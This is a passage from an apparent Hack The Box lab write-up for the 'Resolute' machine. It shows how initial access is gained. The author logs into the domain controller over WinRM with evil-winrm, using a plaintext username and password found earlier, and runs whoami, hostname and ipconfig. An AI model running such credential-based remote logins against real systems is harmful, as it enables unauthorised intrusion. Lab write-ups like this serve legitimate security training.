WinRM
Nmap initially discovered that the target system has a WinRM service running on the port 5985
Enumeration through both ldapdomaindum and bloodhound concludes that I am able to connect directly to the DC host via WinRM
┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ evil-winrm -i resolute.megabank.local -u melanie -p 'Welcome123!'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\melanie\Documents> whoami
megabank\melanie
*evil-winrm* ps c:\Users\melanie\Documents> hostname
Resolute
*evil-winrm* ps c:\Users\melanie\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.169
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{a20a4417-3dc7-47b7-8f00-87cc59d9f43f}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :Initial Foothold established to the target system as the melanie user via WinRM